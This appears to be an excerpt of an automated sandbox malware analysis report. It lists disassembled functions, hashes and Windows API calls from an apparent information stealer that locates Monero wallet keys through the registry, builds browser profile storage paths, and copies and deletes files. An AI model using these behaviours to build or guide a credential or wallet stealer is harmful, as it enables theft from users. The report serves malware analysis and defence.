                                • Associated: 00000000.00000002.2325073043.000000000043F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325073043.00000000005C8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325256322.00000000005DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325274343.000000000075C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325274343.0000000000840000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325274343.000000000086A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325274343.0000000000872000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325274343.0000000000882000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325550913.0000000000883000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325675684.0000000000A1F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325694941.0000000000A20000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_390000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: ebde5e2a3a3629cde61a1f619a5c5249d2c33997370a7c7d20099fd6f94931c8
                                • Instruction ID: df63d58ac4b2f732cadacc900347604a5da2c1eb82a8e5ad23d89c9dd3ae9205
                                • Opcode Fuzzy Hash: ebde5e2a3a3629cde61a1f619a5c5249d2c33997370a7c7d20099fd6f94931c8
                                • Instruction Fuzzy Hash: 795112F3A082045FF314996AECC4776B78ADBD4321F2A863EE754C3784EC798C068295
                                Function 007CD946 Relevance: .2, Instructions: 168COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 00000000.00000002.2325274343.000000000075C000.00000040.00000001.01000000.00000003.sdmp, Offset: 00390000, based on PE: true
                                • Associated: 00000000.00000002.2325048970.0000000000390000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325073043.0000000000391000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325073043.00000000003C7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325073043.000000000041E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325073043.0000000000426000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325073043.000000000043F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325073043.00000000005C8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325256322.00000000005DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325274343.00000000005DC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325274343.0000000000840000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325274343.000000000086A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325274343.0000000000872000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325274343.0000000000882000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325550913.0000000000883000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325675684.0000000000A1F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325694941.0000000000A20000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_390000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 6ca2ca64c326605a8ea3fb15775632056373d7cfd7607cb14f004fabaec317e0
                                • Instruction ID: 9c805fd105c47b61fdc39c157e32a75d1acb2cbc24a002c733700bab3d1a6013
                                • Opcode Fuzzy Hash: 6ca2ca64c326605a8ea3fb15775632056373d7cfd7607cb14f004fabaec317e0
                                • Instruction Fuzzy Hash: 405138F350C6049FD710AE2AEC8566FFBE6EFD8360F16452DE6C483340EA315411C696
                                Function 003A85B0 Relevance: 69.4, APIs: 45, Strings: 1, Instructions: 449stringCOMMON
                                Download Yara Rule
                                APIs
                                • lstrlen.KERNEL32(00000000), ref: 003A8636
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 003A866D
                                • lstrcpy.KERNEL32(?,00000000), ref: 003A86AA
                                • StrStrA.SHLWAPI(?,00F7F190), ref: 003A86CF
                                • lstrcpyn.KERNEL32(005C93D0,?,00000000), ref: 003A86EE
                                • lstrlen.KERNEL32(?), ref: 003A8701
                                • wsprintfA.USER32 ref: 003A8711
                                • lstrcpy.KERNEL32(?,?), ref: 003A8727
                                • StrStrA.SHLWAPI(?,00F7F1C0), ref: 003A8754
                                • lstrcpy.KERNEL32(?,005C93D0), ref: 003A87B4
                                • StrStrA.SHLWAPI(?,00F7F580), ref: 003A87E1
                                • lstrcpyn.KERNEL32(005C93D0,?,00000000), ref: 003A8800
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.2325073043.0000000000391000.00000040.00000001.01000000.00000003.sdmp, Offset: 00390000, based on PE: true
                                • Associated: 00000000.00000002.2325048970.0000000000390000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325073043.00000000003C7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325073043.000000000041E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325073043.0000000000426000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325073043.000000000043F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325073043.00000000005C8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325256322.00000000005DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325274343.00000000005DC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325274343.000000000075C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325274343.0000000000840000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325274343.000000000086A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325274343.0000000000872000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325274343.0000000000882000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325550913.0000000000883000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325675684.0000000000A1F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325694941.0000000000A20000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_390000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: lstrcpy$lstrcpynlstrlen$wsprintf
                                • String ID: %s%s
                                • API String ID: 2672039231-3252725368
                                • Opcode ID: b5c837b3d85e832a1ff63c4c4ab98f9b0165bb562aeb6ce75b8ee4306433cc7c
                                • Instruction ID: f0379d55a7fbea2dcb2b0e8e84e6e40c799766d929ae0a2a0b4ad752a78f7517
                                • Opcode Fuzzy Hash: b5c837b3d85e832a1ff63c4c4ab98f9b0165bb562aeb6ce75b8ee4306433cc7c
                                • Instruction Fuzzy Hash: ECF18A72901914EFCB11DBA4DC4CEEAB7B9EF98700F154599E90AE7250DF34AE04DBA0
                                Function 00391F79 Relevance: 54.4, APIs: 36, Instructions: 407stringfileCOMMON
                                Download Yara Rule
                                APIs
                                • lstrcpy.KERNEL32(00000000,003BCFEC), ref: 00391F9F
                                • lstrlen.KERNEL32(00F78C18), ref: 00391FAE
                                • lstrcpy.KERNEL32(00000000,?), ref: 00391FDB
                                • lstrcat.KERNEL32(00000000,?), ref: 00391FE3
                                • lstrlen.KERNEL32(003C1794), ref: 00391FEE
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 0039200E
                                • lstrcat.KERNEL32(00000000,003C1794), ref: 0039201A
                                • lstrcpy.KERNEL32(00000000,?), ref: 00392042
                                • lstrcat.KERNEL32(00000000,00000000), ref: 0039204D
                                • lstrlen.KERNEL32(003C1794), ref: 00392058
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 00392075
                                • lstrcat.KERNEL32(00000000,003C1794), ref: 00392081
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 003920AC
                                • lstrlen.KERNEL32(?), ref: 003920E4
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 00392104
                                • lstrcat.KERNEL32(00000000,?), ref: 00392112
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 00392139
                                • lstrlen.KERNEL32(003C1794), ref: 0039214B
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 0039216B
                                • lstrcat.KERNEL32(00000000,003C1794), ref: 00392177
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 0039219D
                                • lstrcat.KERNEL32(00000000,00000000), ref: 003921A8
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 003921D4
                                • lstrlen.KERNEL32(?), ref: 003921EA
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 0039220A
                                • lstrcat.KERNEL32(00000000,?), ref: 00392218
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 00392242
                                • lstrcpy.KERNEL32(00000000,003BCFEC), ref: 0039227F
                                • lstrlen.KERNEL32(00F7DD38), ref: 0039228D
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 003922B1
                                • lstrcat.KERNEL32(00000000,00F7DD38), ref: 003922B9
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 003922F7
                                • lstrcat.KERNEL32(00000000), ref: 00392304
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 0039232D
                                • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 00392356
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 00392382
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 003923BF
                                • DeleteFileA.KERNEL32(00000000), ref: 003923F7
                                • FindNextFileA.KERNEL32(00000000,?), ref: 00392444
                                • FindClose.KERNEL32(00000000), ref: 00392453
                                Memory Dump Source
                                • Source File: 00000000.00000002.2325073043.0000000000391000.00000040.00000001.01000000.00000003.sdmp, Offset: 00390000, based on PE: true
                                • Associated: 00000000.00000002.2325048970.0000000000390000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325073043.00000000003C7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325073043.000000000041E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325073043.0000000000426000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325073043.000000000043F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325073043.00000000005C8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325256322.00000000005DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325274343.00000000005DC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325274343.000000000075C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325274343.0000000000840000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325274343.000000000086A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325274343.0000000000872000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325274343.0000000000882000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325550913.0000000000883000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325675684.0000000000A1F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325694941.0000000000A20000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_390000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: lstrcpy$lstrcat$lstrlen$File$Find$CloseCopyDeleteNext
                                • String ID:
                                • API String ID: 2857443207-0
                                • Opcode ID: 686b69bb301db33f2d85faf8815b1d22918a3ea316c91b6261cd50fe22667137
                                • Instruction ID: bba002bf48f904ab308eb435ee1a42b1797e84568372b59ff6f86191c2871f1a
                                • Opcode Fuzzy Hash: 686b69bb301db33f2d85faf8815b1d22918a3ea316c91b6261cd50fe22667137
                                • Instruction Fuzzy Hash: 3EE12C31A12A1AAFCF22EF64DD89EAF77B9AF14300F054164F805AB211DB34DD15CBA4
                                Function 003A6410 Relevance: 52.9, APIs: 29, Strings: 1, Instructions: 438stringCOMMON
                                Download Yara Rule
                                APIs
                                • lstrcpy.KERNEL32(00000000,003BCFEC), ref: 003A6445
                                • lstrcpy.KERNEL32(00000000,003BCFEC), ref: 003A6480
                                • SHGetFolderPathA.SHELL32(00000000,0000001A,00000000,00000000,?), ref: 003A64AA
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 003A64E1
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 003A6506
                                • lstrcat.KERNEL32(00000000,00000000), ref: 003A650E
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 003A6537
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.2325073043.0000000000391000.00000040.00000001.01000000.00000003.sdmp, Offset: 00390000, based on PE: true
                                • Associated: 00000000.00000002.2325048970.0000000000390000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325073043.00000000003C7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325073043.000000000041E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325073043.0000000000426000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325073043.000000000043F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325073043.00000000005C8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325256322.00000000005DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325274343.00000000005DC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325274343.000000000075C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325274343.0000000000840000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325274343.000000000086A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325274343.0000000000872000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325274343.0000000000882000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325550913.0000000000883000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325675684.0000000000A1F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325694941.0000000000A20000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_390000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: lstrcpy$FolderPathlstrcat
                                • String ID: \..\
                                • API String ID: 2938889746-4220915743
                                • Opcode ID: ae73a325043e89da3d9501e29da5395ee789cf0b0079fe6b64dfcf792ebca7a7
                                • Instruction ID: e1de29a1f503c60b47dce7f607f165c02dc45e4ff2b8c993a57543d61ca1aede
                                • Opcode Fuzzy Hash: ae73a325043e89da3d9501e29da5395ee789cf0b0079fe6b64dfcf792ebca7a7
                                • Instruction Fuzzy Hash: 21F19D71D11A06AFCB23AF69D84AAAF77B8EF45300F094168F855DB251DB38DC45CB90
                                Function 003A4370 Relevance: 49.3, APIs: 26, Strings: 2, Instructions: 334stringCOMMON
                                Download Yara Rule
                                APIs
                                • lstrcpy.KERNEL32(00000000,003BCFEC), ref: 003A43A3
                                • lstrcpy.KERNEL32(00000000,003BCFEC), ref: 003A43D6
                                • lstrcpy.KERNEL32(00000000,?), ref: 003A43FE
                                • lstrcat.KERNEL32(00000000,00000000), ref: 003A4409
                                • lstrlen.KERNEL32(\storage\default\), ref: 003A4414
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 003A4431
                                • lstrcat.KERNEL32(00000000,\storage\default\), ref: 003A443D
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 003A4466
                                • lstrcat.KERNEL32(00000000,00000000), ref: 003A4471
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 003A4498
                                • lstrcpy.KERNEL32(00000000,?), ref: 003A44D7
                                • lstrcat.KERNEL32(00000000,?), ref: 003A44DF
                                • lstrlen.KERNEL32(003C1794), ref: 003A44EA
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 003A4507
                                • lstrcat.KERNEL32(00000000,003C1794), ref: 003A4513
                                • lstrlen.KERNEL32(.metadata-v2), ref: 003A451E
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 003A453B
                                • lstrcat.KERNEL32(00000000,.metadata-v2), ref: 003A4547
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 003A456E
                                • lstrcpy.KERNEL32(00000000,?), ref: 003A45A0
                                • GetFileAttributesA.KERNEL32(00000000), ref: 003A45A7
                                • lstrcpy.KERNEL32(00000000,?), ref: 003A4601
                                • lstrcpy.KERNEL32(00000000,?), ref: 003A462A
                                • lstrcpy.KERNEL32(00000000,?), ref: 003A4653
                                • lstrcpy.KERNEL32(00000000,?), ref: 003A467B
                                • lstrcpy.KERNEL32(00000000,003BCFEC), ref: 003A46AF
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.2325073043.0000000000391000.00000040.00000001.01000000.00000003.sdmp, Offset: 00390000, based on PE: true
                                • Associated: 00000000.00000002.2325048970.0000000000390000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325073043.00000000003C7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325073043.000000000041E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325073043.0000000000426000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325073043.000000000043F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325073043.00000000005C8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325256322.00000000005DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325274343.00000000005DC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325274343.000000000075C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325274343.0000000000840000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325274343.000000000086A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325274343.0000000000872000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325274343.0000000000882000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325550913.0000000000883000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325675684.0000000000A1F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325694941.0000000000A20000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_390000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: lstrcpy$lstrcat$lstrlen$AttributesFile
                                • String ID: .metadata-v2$\storage\default\
                                • API String ID: 1033685851-762053450
                                • Opcode ID: 988ff3f0d161dc792a259c459f6b2c0352799c25ff8f166453647ccb9986862b
                                • Instruction ID: b612fca88207ac1939a204a2fd522381a26d070bccf18edf98686be410cce8ee
                                • Opcode Fuzzy Hash: 988ff3f0d161dc792a259c459f6b2c0352799c25ff8f166453647ccb9986862b
                                • Instruction Fuzzy Hash: E7B16D31A12A06AFCF23EF75D94AAAF77A8EF56300F051128F845EB251DB74DC158B90
                                Function 003A57A0 Relevance: 45.5, APIs: 30, Instructions: 486stringCOMMON
                                Download Yara Rule
                                APIs
                                • lstrcpy.KERNEL32(00000000,003BCFEC), ref: 003A57D5
                                • SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?), ref: 003A5804
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 003A5835
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 003A585D
                                • lstrcat.KERNEL32(00000000,00000000), ref: 003A5868
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 003A5890
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 003A58C8
                                • lstrcat.KERNEL32(00000000,00000000), ref: 003A58D3
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 003A58F8
                                • lstrcpy.KERNEL32(00000000,003BCFEC), ref: 003A592E
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 003A5956
                                • lstrcat.KERNEL32(00000000,00000000), ref: 003A5961
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 003A5988
                                • lstrlen.KERNEL32(003C1794), ref: 003A599A
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 003A59B9
                                • lstrcat.KERNEL32(00000000,003C1794), ref: 003A59C5
                                • lstrlen.KERNEL32(00F7DDB0), ref: 003A59D4
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 003A59F7
                                • lstrcat.KERNEL32(00000000,00000000), ref: 003A5A02
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 003A5A2C
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 003A5A58
                                • GetFileAttributesA.KERNEL32(00000000), ref: 003A5A5F
                                • lstrcpy.KERNEL32(00000000,?), ref: 003A5AB7
                                • lstrcpy.KERNEL32(00000000,?), ref: 003A5B2D
                                • lstrcpy.KERNEL32(00000000,?), ref: 003A5B56
                                • lstrcpy.KERNEL32(00000000,?), ref: 003A5B89
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 003A5BB5
                                • lstrcpy.KERNEL32(00000000,003BCFEC), ref: 003A5BEF
                                • lstrcpy.KERNEL32(00000000,?), ref: 003A5C4C
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 003A5C70
                                Memory Dump Source
                                • Source File: 00000000.00000002.2325073043.0000000000391000.00000040.00000001.01000000.00000003.sdmp, Offset: 00390000, based on PE: true
                                • Associated: 00000000.00000002.2325048970.0000000000390000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325073043.00000000003C7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325073043.000000000041E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325073043.0000000000426000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325073043.000000000043F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325073043.00000000005C8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325256322.00000000005DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325274343.00000000005DC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325274343.000000000075C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325274343.0000000000840000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325274343.000000000086A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325274343.0000000000872000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325274343.0000000000882000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325550913.0000000000883000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325675684.0000000000A1F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325694941.0000000000A20000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_390000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: lstrcpy$lstrcat$lstrlen$AttributesFileFolderPath
                                • String ID:
                                • API String ID: 2428362635-0
                                • Opcode ID: 3107ff301a916e4ffb7860e56a89d93a99c926740e83ef3df026faa32331353f
                                • Instruction ID: 4c59041c4428abdc6e766f7c102fad1528d5a9b7ae12e82c977884c95f4025f1
                                • Opcode Fuzzy Hash: 3107ff301a916e4ffb7860e56a89d93a99c926740e83ef3df026faa32331353f
                                • Instruction Fuzzy Hash: 89029071A12A06AFCB23EF68D889AAF77B9EF55300F054128F845EB251DB34DD45CB90
                                Function 00391190 Relevance: 42.3, APIs: 22, Strings: 2, Instructions: 280stringfileCOMMON
                                Download Yara Rule
                                APIs
                                  • Part of subcall function 00391120: GetProcessHeap.KERNEL32(00000000,00000104), ref: 00391135
                                  • Part of subcall function 00391120: RtlAllocateHeap.NTDLL(00000000), ref: 0039113C
                                  • Part of subcall function 00391120: RegOpenKeyExA.ADVAPI32(80000001,SOFTWARE\monero-project\monero-core,00000000,00020119,?), ref: 00391159
                                  • Part of subcall function 00391120: RegQueryValueExA.ADVAPI32(?,wallet_path,00000000,00000000,00000000,000000FF), ref: 00391173
                                  • Part of subcall function 00391120: RegCloseKey.ADVAPI32(?), ref: 0039117D
                                • lstrcat.KERNEL32(?,00000000), ref: 003911C0
                                • lstrlen.KERNEL32(?), ref: 003911CD
                                • lstrcat.KERNEL32(?,.keys), ref: 003911E8
                                • lstrcpy.KERNEL32(00000000,003BCFEC), ref: 0039121F
                                • lstrlen.KERNEL32(00F78C18), ref: 0039122D
                                • lstrcpy.KERNEL32(00000000,?), ref: 00391251
                                • lstrcat.KERNEL32(00000000,00F78C18), ref: 00391259
                                • lstrlen.KERNEL32(\Monero\wallet.keys), ref: 00391264
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 00391288
                                • lstrcat.KERNEL32(00000000,\Monero\wallet.keys), ref: 00391294
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 003912BA
                                • lstrcpy.KERNEL32(00000000,003BCFEC), ref: 003912FF
                                • lstrlen.KERNEL32(00F7DD38), ref: 0039130E
                                • lstrcpy.KERNEL32(00000000,?), ref: 00391335
                                • lstrcat.KERNEL32(00000000,?), ref: 0039133D
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 00391378
                                • lstrcat.KERNEL32(00000000), ref: 00391385
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 003913AC
                                • CopyFileA.KERNEL32(?,?,00000001), ref: 003913D5
                                • lstrcpy.KERNEL32(00000000,?), ref: 00391401
                                • lstrcpy.KERNEL32(00000000,?), ref: 0039143D
                                  • Part of subcall function 003AEDE0: lstrcpy.KERNEL32(00000000,?), ref: 003AEE12
                                • DeleteFileA.KERNEL32(?), ref: 00391471
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.2325073043.0000000000391000.00000040.00000001.01000000.00000003.sdmp, Offset: 00390000, based on PE: true
                                • Associated: 00000000.00000002.2325048970.0000000000390000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325073043.00000000003C7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325073043.000000000041E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325073043.0000000000426000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325073043.000000000043F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325073043.00000000005C8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325256322.00000000005DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325274343.00000000005DC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325274343.000000000075C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325274343.0000000000840000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325274343.000000000086A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325274343.0000000000872000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325274343.0000000000882000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325550913.0000000000883000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325675684.0000000000A1F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325694941.0000000000A20000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_390000_file.jbxd
                                Yara matches
                                Similarity
